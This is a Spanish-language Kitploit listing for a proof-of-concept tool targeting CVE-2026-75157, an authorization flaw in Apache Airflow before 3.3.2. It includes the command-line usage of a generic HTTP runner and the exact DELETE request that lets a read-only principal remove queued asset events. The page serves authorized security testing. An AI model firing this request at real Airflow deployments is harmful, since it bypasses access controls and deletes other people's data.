Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-75157-poc — PoC HTTP universal autorizado e independiente para CVE-2026-75157 | Kitploit
Herramientas/GitHubGitHub/licitrasimone/cve-2026-75157-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsSeguridad WebPruebas de Penetración
GitHublicitrasimone/cve-2026-75157-poc

cve-2026-75157-poc

PoC HTTP universal autorizado e independiente para CVE-2026-75157

Ver Repositorio
27hace 20 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2026-75157

PoC de investigación de seguridad autorizada para la falla de autorización de eventos en cola de Apache Airflow en versiones anteriores a la 3.3.2.

Alcance

Ejecútelo únicamente contra una instancia de Airflow que sea de su propiedad o que esté explícitamente autorizado a probar. El ejecutor predeterminado rechaza objetivos que no sean de loopback. Este repositorio no contiene lógica de escaneo, enumeración de objetivos, persistencia, robo de credenciales ni payloads destructivos.

Archivos

README.md
poc.py

poc.py es un ejecutor universal de solicitudes HTTP consciente del objetivo. Acepta la URL de destino, el método, la ruta, los encabezados, el cuerpo, la fuente de autenticación y el resultado esperado desde la línea de comandos en lugar de codificar un host de forma fija.

Uso

Verificación de estado contra un laboratorio local de Airflow:

python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/monitor/health \
  --method GET \
  --expect-status 200 \
  --expect-body healthy

Disparador de CVE contra una instancia local vulnerable de Airflow ya preparada:

export AIRFLOW_POC_TOKEN='lab-only-restricted-token'
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/dags/cve_2026_75157_poc_dag/assets/queuedEvents \
  --method DELETE \
  --bearer-env AIRFLOW_POC_TOKEN \
  --expect-status 204

El token debe pertenecer a un principal desechable con acceso de lectura a DAG y acceso de eliminación a Assets. El comportamiento vulnerable esperado es que el principal restringido pueda eliminar el evento en cola. Airflow 3.3.2 o posterior debería rechazar la misma solicitud a menos que el principal también tenga acceso de edición a DAG.

Opciones

--target URL              Required absolute HTTP(S) target
--path PATH               Optional path joined to --target
--method METHOD           GET, POST, PUT, PATCH, DELETE, HEAD
--header 'Name: Value'    Repeatable request header
--bearer-env ENV          Read a bearer token from ENV without printing it
--json JSON               JSON request body
--body-file FILE          Raw request body
--expect-status STATUS    Repeatable expected status assertion
--expect-body TEXT        Repeatable response-body assertion
--timeout SECONDS
--no-follow-redirect
--allow-non-loopback      Explicit opt-in for an authorized non-lab target

El ejecutor devuelve el código de salida 0 para una aserción aprobada, 1 para errores de alcance/transporte/argumentos y 2 para un fallo de aserción HTTP. Los valores de autorización y cookies se redactan en la salida.

Contexto de la vulnerabilidad

Antes de Airflow 3.3.2, las rutas DELETE de eventos en cola verificaban el eje DAG con permiso de lectura en lugar de permiso de edición. La corrección cambia el requisito de autorización de DAG al permiso de nivel de escritura. Este PoC envía la solicitud HTTP real; no crea el usuario de laboratorio ni el fixture de base de datos.

Referencias

  • https://www.openwall.com/lists/oss-security/2026/09/18/1
  • https://github.com/apache/airflow/pull/71736
  • https://airflow.apache.org/docs/apache-airflow/3.3.1/howto/docker-compose/index.html
  • https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/access-control.html
Descargar herramienta